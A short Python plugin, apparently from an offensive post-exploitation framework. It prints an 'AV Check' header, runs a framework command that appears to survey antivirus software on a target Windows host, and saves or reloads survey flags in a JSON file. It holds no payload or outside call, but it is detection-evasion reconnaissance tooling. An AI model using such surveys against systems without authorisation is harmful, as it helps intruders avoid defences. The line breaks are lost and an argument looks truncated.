import json import os import dsz import ops, ops.env, ops.survey DONUTS = os.path.join(ops.LOGDIR, 'donuts.json') def donuts(): if (not os.path.exists(DONUTS)): return False flags = None with open(DONUTS) as input: try: flags = json.load(input) except: return False for i in flags.keys(): ops.env.set(i, flags[i]) return True def save_donuts(): flags = {} for i in ops.survey.flags(): flags[i] = (True if (dsz.env.Get(i).upper() == 'TRUE') else False) with open(DONUTS, 'w') as output: json.dump(flags, output, indent=2) def main(): ops.survey.print_header('AV Check!!!') psp_cmd = ops.cmd.getDszCommand('python', arglist=['windows\\'], project='Ops', dszquiet=False) psp_cmd.execute() save_donuts() if ((__name__ == '__main__') or (__name__ == ops.survey.PLUGIN)): main()